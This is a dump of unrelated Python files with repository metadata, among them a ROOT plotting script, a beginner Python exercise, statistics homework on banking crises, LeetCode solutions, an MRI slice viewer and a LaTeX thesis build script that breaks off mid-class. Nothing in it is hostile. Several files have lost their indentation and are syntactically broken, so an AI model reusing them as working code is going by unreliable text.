legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pZ,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pZ,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.C")
h_dimuon_1_Eta_dummy.Draw()
h_dimuon_1_Eta.DrawNormalized("same")
h_dimuon_2_Eta.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Eta,h_dimuon_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Eta,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Eta,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.C")
h_dimuon_1_Phi_dummy.Draw()
h_dimuon_1_Phi.DrawNormalized("same")
h_dimuon_2_Phi.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Phi,h_dimuon_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Phi,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Phi,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.C")
h_dimuon_1_p_dummy.Draw()
plotOverflow(h_dimuon_1_p)
plotOverflow(h_dimuon_2_p)
scaleAxisY(h_dimuon_2_p,h_dimuon_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_p,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_p,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.C")
BAM.Write()
print "Made it to the end and closes"
f.close()
# ==== /pythonPractice/ex26.py (repo: David-GaTre/Python-the-hard-way) ====
def break_words(stuff):
"""This function will break up words for us."""
words = stuff.split(' ')
return words
def sort_words(words):
"""Sorts the words."""
return sorted(words)
def print_first_word(words):
"""Prints the first word after popping it off."""
word = words.pop(0)
print word
def print_last_word(words):
"""Prints the last word after popping it off."""
word = words.pop(-1)
print word
def sort_sentence(sentence):
"""Takes in a full sentence and returns the sorted words."""
words = break_words(sentence)
return sort_words(words)
def print_first_and_last(sentence):
"""Prints the first and last words of the sentence."""
words = break_words(sentence)
print_first_word(words)
print_last_word(words)
def print_first_and_last_sorted(sentence):
"""Sorts the words then prints the first and last one."""
words = sort_sentence(sentence)
print_first_word(words)
print_last_word(words)
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explanation
\n\t\twhere there is none.
"""
print "--------------"
print poem
print "--------------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
print "We'd have %d jeans, %d jars, and %d crates." % (beans, jars, crates)
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crabapples." % secret_formula(start_point)
sentence = "All good things come to those who weight."
words = break_words(sentence)
sorted_words = sort_words(words)
print_first_word(words)
print_last_word(words)
print_first_word(sorted_words)
print_last_word(sorted_words)
sorted_words = sort_sentence(sentence)
print sorted_words
print_first_and_last(sentence)
print_first_and_last_sorted(sentence)
# ==== /Scripts/plottingCodes/DescritiveData.py (repo: iphyer/CS760_Twitter_Demographics) ====
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 5 20:44:28 2017
@author: mingrenshen
"""
# import libraries needed
import pandas as pd # data processing
import matplotlib.pyplot as plt
######################################################
# read in data
######################################################
## user data
allUsrFeatureData = pd.read_csv("../data/louis_users_all_features_label_1205_updated.csv")
# plotting Data
#grouped = allUsrFeatureData['freqWeekDay'].groupby('gender')
print allUsrFeatureData['gender'].value_counts()
# Font for figure
font_axis_publish = {
'color': 'black',
'weight': 'normal',
'size': 15,
}
#ax = allUsrFeatureData.boxplot(column='freqWeekDay',by='gender')
#plt.ylabel('RMSF ($\AA$)', fontdict=font_axis_publish)
#plt.xlim(0,1000)
#plt.set_title("")
col_list = list(allUsrFeatureData.columns.values)
starting_index = col_list.index("gender")
for i in range(len(col_list)):
if i > starting_index:
curr_feature = col_list[i]
allUsrFeatureData.boxplot(column=curr_feature,by='gender')
plt.title(curr_feature, fontdict=font_axis_publish)
plt.suptitle("")
plt.xlabel('gender', fontdict=font_axis_publish)
#plt.show()
str_tmp = curr_feature + '.png'
plt.savefig(str_tmp)
plt.close()
|
[
"iphyer@163.com"
] |
iphyer@163.com
|
e9155963542c0338f2e00c360ebb229b888acae0
|
439f1b3e2e7a454abd2cfac99d3074ba02405c09
|
/code.py
|
9c2f9842cf2aaa24cd16140cf0d7ad625a5414ae
|
[
"MIT"
] |
permissive
|
saikrishnan255/extracting-business-insights
|
10c1286fafa41d59907b7b9afabf39fdd1300c56
|
b79922148bd1aa80bea9d3571456f2891f06c713
|
refs/heads/main
| 2023-02-04T16:03:35.220099
| 2020-12-22T11:30:22
| 2020-12-22T11:30:22
| 323,607,104
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,061
|
py
|
# --------------
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats as st  # assumed import: central_tendency() below refers to st.mode
df = pd.read_csv(path)  # 'path' is expected to be provided by the hosting environment
def visual_summary(type_, df, col):
    """Summarize the Data using Visual Method.
    This function accepts the type of visualization, the data frame and the column to be summarized.
    It displays the chart based on the given parameters.
    Keyword arguments:
    type_ -- visualization method to be used
    df -- the dataframe
    col -- the column in the dataframe to be summarized
    """
    df[col].plot(kind=type_)
    plt.show()
def central_tendency(type_, df, col):
    """Calculate the measure of central tendency.
    This function accepts the type of central tendency to be calculated, the data frame and the required column.
    It returns the calculated measure.
    Keyword arguments:
    type_ -- type of central tendency to be calculated
    df -- the dataframe
    col -- the column in the dataframe to do the calculations
    Returns:
    cent_tend -- the calculated measure of central tendency
    """
    stats = {'mean': np.mean, 'median': np.median, 'mode': st.mode}
    return stats[type_](df[col])
def ranger(df):
return max(df) - min(df)
def mad(df):
return(np.mean(np.absolute(df - np.mean(df))))
def cv(df):
return(((np.std(df)/np.mean(df)))*100)
def iqr(df):
return (np.percentile(df,75)- np.percentile(df,25))
def measure_of_dispersion(type_, df, col):
    """Calculate the measure of dispersion.
    This function accepts the measure of dispersion to be calculated, the data frame and the required column(s).
    It returns the calculated measure.
    Keyword arguments:
    type_ -- type of measure of dispersion to be calculated
    df -- the dataframe
    col -- the column(s) in the dataframe to do the calculations, this is a list with 2 elements if we want to calculate covariance
    Returns:
    disp -- the calculated measure of dispersion
    """
    # rowvar=False makes np.cov treat each column (not each row) as a variable
    stats = {'Standard Deviation': np.std, 'Variance': np.var, 'Range': ranger,
             'Covariance': lambda x: np.cov(x, rowvar=False), 'MAD': mad, 'CV': cv, 'IQR': iqr}
    return stats[type_](df[col])
def calculate_correlation(type_, df, col1, col2):
    """Calculate the defined correlation coefficient.
    This function accepts the type of correlation coefficient to be calculated, the data frame and the two columns.
    It returns the calculated coefficient.
    Keyword arguments:
    type_ -- type of correlation coefficient to be calculated
    df -- the dataframe
    col1 -- first column
    col2 -- second column
    Returns:
    corr -- the calculated correlation coefficient
    """
    if type_ == 'Pearson':
        # use the sample std (ddof=1) to match df.cov(), which is also sample-based
        return df.cov().loc[col1, col2] / (df[col1].std() * df[col2].std())
    elif type_ == 'Spearman':
        d = df[[col1, col2]].rank(axis=0)
        d['d^2'] = (d[col1] - d[col2])**2
        d_square = d['d^2'].sum()
        l = len(df[col1])
        spearman = 1 - ((6 * d_square) / (l * (l**2 - 1)))
        return spearman
def calculate_probability_discrete(data, event):
    """Calculates the probability of an event from a discrete distribution.
    This function accepts the dataframe holding the distribution of a variable and the event column, and returns the probability of the event.
    Keyword arguments:
    data -- dataframe that contains the distribution of the discrete variable
    event -- the column for which the probability is to be calculated
    Returns:
    prob -- calculated probability of the event
    """
    # assumes a binary column whose rarer value marks the event of interest
    crisis = data[event].value_counts()
    return crisis.iloc[1] / (crisis.iloc[0] + crisis.iloc[1])
def event_independence_check(prob_event1, prob_event2, prob_event1_event2):
    """Checks if two events are independent.
    This function accepts the probability of 2 events and their joint probability.
    It returns whether the events are independent or not.
    Keyword arguments:
    prob_event1 -- probability of event1
    prob_event2 -- probability of event2
    prob_event1_event2 -- probability of event1 and event2
    """
    # P(A|B) = P(A and B) / P(B); independence means P(A|B) == P(A).
    # Note: exact float equality is strict; np.isclose would be more robust.
    pa_b = prob_event1_event2 / prob_event2
    if pa_b == prob_event1:
        return 'Independent'
    else:
        return 'Dependent'
# Checking if banking crisis is independent
b_s = df[(df['systemic_crisis'] == 1) & (df['banking_crisis'] == 'crisis')]
b_i = df[(df['inflation_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
b_c = df[(df['currency_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
p_bank_system = b_s['case'].count()/df['case'].count()
p_bank_currency = b_c['case'].count()/df['case'].count()
p_bank_inflation = b_i['case'].count()/df['case'].count()
p_bank = calculate_probability_discrete(df,'banking_crisis')
p_system = calculate_probability_discrete(df,'systemic_crisis')
p_inflation = calculate_probability_discrete(df,'inflation_crises')
p_currency = calculate_probability_discrete(df,'currency_crises')
# System
event_independence_check(p_bank, p_system, p_bank_system)
# Currency
event_independence_check(p_bank, p_currency, p_bank_currency)
# Inflation
event_independence_check(p_bank, p_inflation, p_bank_inflation)
# Bank given system
p_b_s = p_bank_system/p_system
p_b_c = p_bank_currency/p_currency
p_b_i = p_bank_inflation/p_inflation
prob_ = [p_b_s,p_b_c,p_b_i]
def bayes_theorem(df, col1, event1, col2, event2):
    """Calculates the conditional probability using Bayes Theorem.
    This function accepts the dataframe, two columns along with two conditions to calculate the probability, P(B|A).
    You can call the calculate_probability_discrete() to find the basic probabilities and then use them to find the conditional probability.
    Keyword arguments:
    df -- the dataframe
    col1 -- the first column where the first event is recorded
    event1 -- event to define the first condition
    col2 -- the second column where the second event is recorded
    event2 -- event to define the second condition
    Returns:
    prob -- calculated probability for the event1 given event2 has already occurred
    """
    # Minimal implementation (the original body was left blank):
    # P(event1 | event2) = P(event1 and event2) / P(event2)
    p_joint = len(df[(df[col1] == event1) & (df[col2] == event2)]) / len(df)
    p_event2 = len(df[df[col2] == event2]) / len(df)
    return p_joint / p_event2
|
[
"70769945+saikrishnan255@users.noreply.github.com"
] |
70769945+saikrishnan255@users.noreply.github.com
|
0ad9fe4925f4b28b1e4d34b71d268ddf45ccb8a2
|
301e55ee3990b2daf135197eac81e1cc244e6cd3
|
/python/search-in-rotated-sorted-array.py
|
ac8d648b579b72e53fc06f4ec7a23090d95a213e
|
[
"MIT"
] |
permissive
|
alirezaghey/leetcode-solutions
|
74b1b645c324ea7c1511d9ce3a97c8d622554417
|
c32b786e52dd25ff6e4f84242cec5ff1c5a869df
|
refs/heads/master
| 2022-08-22T16:28:05.459163
| 2022-08-18T12:02:51
| 2022-08-18T12:02:51
| 203,028,081
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 996
|
py
|
from typing import List
class Solution:
# Time complexity: O(log n) where n is the length of nums
# Space complexity: O(1)
def search(self, nums: List[int], target: int) -> int:
left, right = 0, len(nums)-1
while left <= right:
mid = left + (right - left) // 2
if nums[mid] < target:
if nums[mid] < nums[-1]: # right part
if target > nums[-1]:
right = mid-1
else:
left = mid+1
else: # left part
left = mid+1
elif nums[mid] > target:
if nums[mid] < nums[-1]: # right part
right = mid-1
else: # left part
if target < nums[0]:
left = mid+1
else:
right = mid-1
else:
return mid
return -1
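# Quick sanity checks (added for illustration; not part of the original
# solution) covering a target in the right part, one in the left part,
# and a miss:
if __name__ == "__main__":
    sol = Solution()
    assert sol.search([4, 5, 6, 7, 0, 1, 2], 0) == 4
    assert sol.search([4, 5, 6, 7, 0, 1, 2], 5) == 1
    assert sol.search([4, 5, 6, 7, 0, 1, 2], 3) == -1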
|
[
"alireza.q1357@gmail.com"
] |
alireza.q1357@gmail.com
|
d9c783ad8abf89d55348ad7b4a292cdac5bbf359
|
91a0bfacb61ae681860c560ba52ac09df4910b8f
|
/Codes/visualize.py
|
6289ddbd090a1437bbe538404c0c01dd6a2e14a9
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
AayushKadam/brain_age
|
98609293827778b978215b9d681f521fdab6d948
|
8a768e29046d525fdef3d57a58c742b52ed6f8e7
|
refs/heads/master
| 2021-10-15T19:18:22.779808
| 2019-02-05T20:12:46
| 2019-02-05T20:12:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,366
|
py
|
import os
import matplotlib.pyplot as plt
import numpy as np
import random
#import scipy.ndimage
def show_slices(slices):
""" Function to display row of image slices """
fig, axes = plt.subplots(1, len(slices))
for i, slice in enumerate(slices):
axes[i].imshow(slice.T, cmap="gray", origin="lower")
def rot90(m, k=1, axis=2):
"""Rotate an array by 90 degrees in the counter-clockwise direction around the given axis"""
m = np.swapaxes(m, 2, axis)
m = np.rot90(m, k)
m = np.swapaxes(m, 2, axis)
return m
#first = np.load('data2\\1#(65, 65, 55).npy')
"""
X_before = 5
npad = ((5, 5), (0, 0), (0, 0))
first = np.pad(first, pad_width=npad, mode='constant', constant_values=0)
startz = 65//2-(55//2)
first = first[0:65,0:65, startz:startz+55]
"""
first = np.load('data2\\85#(65, 65, 55).npy')
#first = np.load('mean_img2.npy')
second = np.load('shuffled2\\45#(65, 65, 55).npy')
#first = rot90(first, 3, 0)
#first = rot90(first, 1, 2)
print(first.shape)
show_slices([
first[int(first.shape[0]/2), :, :],
first[:, int(first.shape[1]/2), :],
first[:, :, int(first.shape[2]/2)]])
plt.show()
show_slices([second[int(second.shape[0]/2), :, :],
second[:, int(second.shape[1]/2), :],
second[:, :, int(second.shape[2]/2)]])
plt.show()
|
[
"zach_lyu@berkeley.edu"
] |
zach_lyu@berkeley.edu
|
5277a28915df23b9142e32432af44be09e017f3a
|
3add20877ed753be70402e97f40ad3737a265515
|
/lecture_advanced/Lecture1.HotFollowupQuestions/386. Longest Substring with At Most K Distinct Characters.py
|
93cfa12ae7c8ad41d8048f0341ca09073b900826
|
[] |
no_license
|
zhuohuwu0603/interview-algothims
|
85f48b7de2e87129fd353528b114cb80c8877d7b
|
338d3bc2f2916c5c4936767b07b2fd22b4121049
|
refs/heads/master
| 2022-01-08T11:27:16.441367
| 2019-06-12T05:49:25
| 2019-06-12T05:49:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,347
|
py
|
'''
Given a string s, find the length of the longest substring T that contains at most k distinct characters.
Example
For example, Given s = "eceba", k = 3,
T is "eceb" which its length is 4.
Challenge
O(n), n is the size of the string s.
'''
import collections
class Solution:
"""
@param s: A string
@param k: An integer
@return: An integer
"""
def lengthOfLongestSubstringKDistinct(self, s, k):
# write your code here
if not s or k <= 0:
return 0
start, end, ans = 0, 0, 0
myhash = collections.defaultdict(int)
for start in range(len(s)):
            while end < len(s):
                myhash[s[end]] += 1
                if len(myhash) <= k:
                    end += 1
                else:
                    # undo the speculative increment before breaking, so the
                    # hash always mirrors the window [start, end); otherwise
                    # stale counts accumulate (e.g. s = "abacbbdd", k = 2)
                    # and later windows are cut short
                    myhash[s[end]] -= 1
                    if myhash[s[end]] == 0:
                        del myhash[s[end]]
                    break
ans = max(ans, end - start)
myhash[s[start]] -= 1
if myhash[s[start]] == 0:
del myhash[s[start]]
return ans
'''
Technique: forward-moving sliding window with two pointers
This problem fits the sliding-window template:
    - keep three variables: start, end, ans
    - start drives the outer for loop
    - end advances inside the inner while loop
    - the while condition combines the bound on end with the problem constraint
    - guard each answer update with the required condition
    - update the answer before advancing end
    - all hash-table bookkeeping happens inside the while loop; in general no
      special handling is needed at the for level
Notes:
    This problem asks for an upper bound (the longest valid window).
    The answer can be updated directly as the inner while loop runs rather
    than only after it exits, because the loop runs only while end is in
    bounds and the constraint still holds: every extension corresponds to a
    valid window that can be compared against the global best.
    Still confirm the condition before updating the answer:
        if len(hashmap) <= k:
            ans = max(ans, end - start + 1)
    Lower-bound problems (e.g. shortest subarray with sum >= target) are the
    opposite: there the while loop keeps widening the window while the
    condition is NOT yet met, so a valid window may only exist after the loop
    exits, and the condition must be re-checked before comparing against the
    global answer.
'''
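# Illustrative checks (added): the example from the problem statement plus a
# case that would expose the stale-count issue fixed in the while loop above.
if __name__ == '__main__':
    sol = Solution()
    assert sol.lengthOfLongestSubstringKDistinct("eceba", 3) == 4
    assert sol.lengthOfLongestSubstringKDistinct("abacbbdd", 2) == 4  # "bbdd"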
|
[
"michaelz@squareup.com"
] |
michaelz@squareup.com
|
9094d0aa7881214514389028e5649424dde7e59d
|
d180d7bea0db0aa65ee6d6112c14da903b1867b5
|
/run.py
|
58fee9cdd7064a02060da43ffe06f863a65d5852
|
[
"CC-BY-4.0"
] |
permissive
|
willemsk/phdthesis-text
|
694eb21b0465b67f26291d0349c3fee821562311
|
43d0f0f68bb84e6305f6b430816f8585ce4e8112
|
refs/heads/main
| 2023-06-22T22:17:33.632485
| 2023-06-07T12:54:06
| 2023-06-07T12:54:06
| 345,727,833
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,723
|
py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (C), 2012-2014 by Wannes Meert, KU Leuven
#
# Very naive compilation script for the ADSPHD class.
#
# No file dependency checks are performed (use TeXnicCenter, Texmaker, latexmk,
# rubber, SCons, or make if you want such a feature).
#
import glob
import os
import re
import shlex
import sys
import argparse
from collections import namedtuple
from subprocess import *
## SETTINGS ##
given_settings = {
'mainfile': 'thesis.tex',
'chaptersdir': 'chapters',
'makebibliography': True,
'makeindex': True,
'makeglossary': True,
'makenomenclature': True,
'usebiblatex': True,
'biblatexbackend': 'biber', # alternative: bibtex
'cleanext': ['.tdo','.fls','.toc','.aux','.log','.bbl','.blg','.log',
'.lof','.lot','.ilg','.out','.glo','.gls','.nlo','.nls',
'.brf','.ist','.glg','.synctexgz','.tgz','.idx','.ind',
'-blx.bib','.fdb_latexmk','.synctex.gz','.run.xml',
'.bcf','.glsdefs','.xdy']
}
derived_settings = ['basename', 'chapters', 'cleanfiles', 'pdffile']
verbose = 0
dry = False
### INITIALISATION ###
def initapplications():
"""Initialize the application commands and arguments for the different
platforms."""
global apps
# Unix and linux are the default setup
## *NIX ##
apps.pdflatex = App('pdflatex', '-interaction=nonstopmode -synctex=1 -shell-escape {basename}', verbose)
apps.bibtex = App('bibtex', '--min-crossref=100 {basename}', verbose)
apps.biber = App('biber', '{basename}', verbose)
apps.glossary = App('makeindex', '{basename}.glo -s {basename}.ist -o {basename}.gls', verbose)
apps.nomenclature = App('makeindex', '{basename}.nlo -s nomencl.ist -o {basename}.nls', verbose)
apps.pdfviewer = App('acroread', '{pdffile}', verbose)
apps.remove = App('rm', '-f {cleanfiles}', verbose)
if sys.platform == 'darwin':
## Mac OS X ##
apps.pdfviewer = App('open', '{pdffile}', verbose)
elif sys.platform == 'win32' or sys.platform == 'cygwin':
## Windows ##
## TODO: does not yet work
pass
## DERIVED SETTINGS ##
def create(*args, **kwargs):
class DictAsObj():
def __init__(self, *args, **kwargs):
self.__dict__ = kwargs
for arg in args:
self.__dict__[arg] = None
def __iter__(self):
return self.__dict__.items().__iter__()
def items(self):
return dict(self.__dict__.items())
def copy(self):
return DictAsObj(**self.__dict__)
return DictAsObj(*args, **kwargs)
settings = create(*derived_settings, **given_settings)
settings.basename = os.path.splitext(settings.mainfile)[0]
settings.chapters = [name.replace(".tex", "") for name in glob.glob('chapters/**/*.tex')]
settings.cleanfiles = " ".join([base+ext for ext in settings.cleanext for base in [settings.basename]+settings.chapters])
settings.pdffile = settings.basename+'.pdf'
apps = create('pdflatex', 'bibtex', 'biber', 'glossary', 'nomenclature', 'pdfviewer', 'remove')
## COMPILE ##
knowntargets = dict()
def target(targetname = None):
def decorate(f):
global knowntargets
name = targetname if targetname else f.__name__
knowntargets[name] = f
return f
return decorate
## TARGETS ##
@target()
def test():
"""Verify the settings in run.py"""
allok = testSettings()
if allok:
print("Your settings appear to be consistent")
if verbose > 0:
for k,v in settings:
if verbose > 1 or k not in ['cleanfiles']:
print("{}: {}".format(k, v))
else:
print("(use -v to inspect).")
@target()
def pdf():
"""Alias for compile"""
return compile()
@target()
def compile():
"""Build thesis.pdf"""
testSettings()
latex()
def latex():
global apps
rerun = False
print('#### LATEX ####')
apps.pdflatex.run(settings, 'Latex failed')
if settings.makebibliography:
rerun = True
if settings.usebiblatex and settings.biblatexbackend == 'biber':
print('#### BIBER ####')
apps.biber.run(settings, 'Biber failed')
else:
print('#### BIBTEX ####')
apps.bibtex.run(settings, 'Bibtex failed')
if settings.makeindex:
rerun = True
print('#### INDEX ####')
if settings.makeglossary:
# List of abbreviations
rerun = True
print('#### GLOSSARY ####')
apps.glossary.run(settings, 'Creating glossary failed')
if settings.makenomenclature:
# List of symbols
rerun = True
print('#### NOMENCLATURE ####')
apps.nomenclature.run(settings, 'Creating glossary failed')
if rerun:
print('#### LATEX ####')
apps.pdflatex.run(settings, 'Rerunning (1) Latex failed')
print('#### LATEX ####')
apps.pdflatex.run(settings, 'Rerunning (2) Latex failed')
@target()
def clean():
"""Remove the auxiliary files created by Latex."""
global apps
apps.remove.run(settings, 'Removing auxiliary files failed')
@target()
def realclean():
"""Remove all files created by Latex."""
global apps
clean()
newsettings = settings.copy()
    newsettings.cleanfiles += ' thesis.pdf thesis.dvi thesis.ps'  # leading space keeps the file list space-separated
apps.remove.run(newsettings, 'Removing pdf files failed.')
@target()
def cover():
"""Generate a cover.tex file and produce a standalone cover.pdf"""
usersettings = dict()
doc_re = re.compile(r"^\\documentclass")
settings_re = [
('faculty', re.compile("faculty=([a-z]+)")),
('department', re.compile("department=([a-z]+)")),
('phddegree', re.compile("phddegree=([a-z]+)"))
]
content = []
doadd = False
with open(settings.mainfile,'r') as mf:
for line in mf:
if "documentclass" in line:
if doc_re.match(line) is not None:
for s, r in settings_re:
result = r.search(line)
if result is not None:
usersettings[s] = result.group(1)
if doadd:
content.append(line)
if "%%% COVER: Settings" in line:
doadd = True
elif "%%% COVER: End" in line:
doadd = False
if verbose > 0:
print('Recovered settings: ')
print(usersettings)
extra_usersettings = ','.join(['']+['{}={}'.format(k,v) for k,v in usersettings.items()])
with open('cover.tex','w') as cf:
cf.write("""% Cover.tex
\\documentclass[cam,cover{}]{{adsphd}}""".format(extra_usersettings))
cf.write("""
\\usepackage{printlen}
\\uselengthunit{mm}
""")
cf.write("".join(content))
cf.write("""
% Compute total page width
\\newlength{\\fullpagewidth}
\\setlength{\\fullpagewidth}{2\\adsphdpaperwidth}
\\addtolength{\\fullpagewidth}{2\\defaultlbleed}
\\addtolength{\\fullpagewidth}{2\\defaultrbleed}
\\addtolength{\\fullpagewidth}{\\adsphdspinewidth}
\\geometry{
paperwidth=\\fullpagewidth,
paperheight=\\adsphdpaperheight,
}
\\pagestyle{empty}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\\begin{document}
\\makefullcoverpage{\\adsphdspinewidth}{}
\\newlength{\\testje}
\\setlength{\\testje}{10mm}
\\mbox{}
\\newpage
\\subsection*{Used settings:}
\\begin{itemize}
\\item Spine width: \\printlength{\\adsphdspinewidth}
\\item Left bleed: \\printlength{\\lbleed}
\\item Right bleed: \\printlength{\\rbleed}
\\item Paper width: \\printlength{\\adsphdpaperwidth}
\\item Paper height: \\printlength{\\adsphdpaperheight}
\\item Text width: \\printlength{\\textwidth}
\\item Text height: \\printlength{\\textheight}
\\end{itemize}
\\end{document}
""")
print("Written cover to cover.tex")
newsettings = settings.copy()
newsettings.basename = 'cover'
apps.pdflatex.run(newsettings, 'Running Latex failed')
@target()
def newchapter():
"""Create the necessary files for a new chapter."""
chaptername = ""
validchaptername = re.compile(r'^[a-zA-Z0-9_.]+$')
while validchaptername.match(chaptername) == None:
chaptername = input("New chapter file name (only a-z, A-Z, 0-9 or _): ")
newdirpath = os.path.join(settings.chaptersdir, chaptername)
print("Creating new directory: "+newdirpath)
if not os.path.exists(newdirpath):
os.makedirs(newdirpath)
newfilepath = os.path.join(newdirpath,chaptername+".tex")
print("Creating new tex-file: "+newfilepath)
newfile = open(newfilepath, 'w')
print("% !TeX root = ../../"+settings.mainfile, file=newfile)
print("\\chapter{This is "+chaptername+"}\\label{ch:"+chaptername+"}\n", file=newfile)
print("\n\\ldots\n\n\n\n\
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n\
% Keep the following \\cleardoublepage at the end of this file, \n\
% otherwise \\includeonly includes empty pages.\n\
\\cleardoublepage\n", file=newfile)
newfile.close()
@target()
def view():
"""Open the generated pdf file in a pdf viewer."""
print("Opening "+settings.pdffile)
apps.pdfviewer.run(settings, 'Opening pdf failed.')
@target()
def targets():
"""Print overview of available targets."""
print("Targets:")
targetdocs = [(target,f.__doc__) for (target,f) in knowntargets.items()]
maxl = max((len(t) for (t,d) in targetdocs))
targetdocs.sort()
for (target,doc) in targetdocs:
s = "- {:<"+str(maxl)+"} {}"
if doc == None:
doc = ''
print(s.format(target,doc))
## AUXILIARY ##
def testSettings():
    """Verify whether run.py is using the expected settings based on
    thesis.tex.
    """
    # Run every check unconditionally so that all warnings are printed,
    # instead of short-circuiting after the first failure.
    results = [testBiblatex(), testNomenclature(), testGlossary()]
    return all(results)
def testBiblatex():
    """Test whether the main tex file includes biblatex and if this is
    consistent with the settings in run.py
    """
    allok = True
    isusingbiblatex = False
    # pattern = re.compile(r'^\\documentclass.*biblatex*.*$')
    pattern = re.compile(r'^\s*[^%].*{biblatex}')
    with open(settings.mainfile, 'r') as f:
        for line in f:
            if pattern.search(line) != None:
                isusingbiblatex = True
                if not settings.usebiblatex:
                    print("WARNING: It appears you are using biblatex while this setting in run.py is set to false.\n")
                    allok = False
                    # settings.usebiblatex = True
                    return allok
    if not isusingbiblatex and settings.usebiblatex:
        print("WARNING: It appears you are not using biblatex while this setting in run.py is set to true.\n")
        # settings.usebiblatex = False
        allok = False
    return allok
def testNomenclature():
    """Check whether the nomenclature settings are consistent."""
    allok = True
    pattern = re.compile(r'^\s*\\usepackage.*{nomencl}.*')
    found = False
    with open(settings.mainfile, 'r') as texfile:
        for line in texfile:
            if pattern.search(line) != None:
                found = True
    if not found and settings.makenomenclature:
        print("\nWARNING: Trying to build the nomenclature but you have not included the nomencl Latex package.\n")
        allok = False
    if found and not settings.makenomenclature:
        print("\nWARNING: You have included the nomencl Latex package but in the run.py script this step is not activated.\n")
        allok = False
    return allok
def testGlossary():
    """Check whether the glossaries settings are consistent."""
    allok = True
    pattern = re.compile(r'^\s*\\usepackage.*{glossaries.*')
    found = False
    with open(settings.mainfile, 'r') as texfile:
        for line in texfile:
            if pattern.search(line) != None:
                found = True
    if not found and settings.makeglossary:
        print("\nWARNING: Trying to build the glossary but you have not included the glossaries Latex package.\n")
        allok = False
    if found and not settings.makeglossary:
        print("\nWARNING: You have included the glossaries Latex package but in the run.py script this step is not activated.\n")
        allok = False
    return allok
## APPLICATION ##
class App:
def __init__(self, b, o, v=0):
